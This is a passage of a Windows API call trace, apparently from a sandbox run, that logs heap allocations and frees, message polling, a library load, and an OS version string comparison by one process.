RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0207.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0207.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0207.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.142] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0207.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0207.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0207.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0207.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.142] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.142] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0207.143] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0207.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0207.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0207.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17d8 [0207.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa080 [0207.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0207.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0207.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0207.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0207.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0207.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0207.144] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0207.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0207.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0207.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0207.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0207.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0207.144] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0207.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0207.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0207.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0207.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0207.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0207.145] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0207.145] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0207.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0207.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0207.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0207.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.145] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0207.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0207.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0207.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0207.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.146] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0207.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0207.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0207.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0207.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0207.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0207.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0207.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0207.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0207.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.147] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0207.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0207.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0207.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0207.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0207.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0207.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0207.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0207.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0207.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0207.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.148] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0207.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b30f8 [0207.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.149] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0207.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0207.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0207.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0207.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0207.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0207.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa188 [0207.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0207.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0207.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0207.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0207.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0207.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0207.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0207.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0207.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0207.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0207.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0207.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.150] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0207.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0207.151] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0207.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e40 [0207.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0207.151] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0207.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0207.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0207.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0207.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0207.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.152] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0207.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0207.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0207.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0207.152] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0207.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0207.152] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0207.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0207.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0207.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0207.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0207.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0207.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0207.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0207.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0207.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0207.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0207.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0207.154] HeapFree (in: hHeap=0x25c0000, 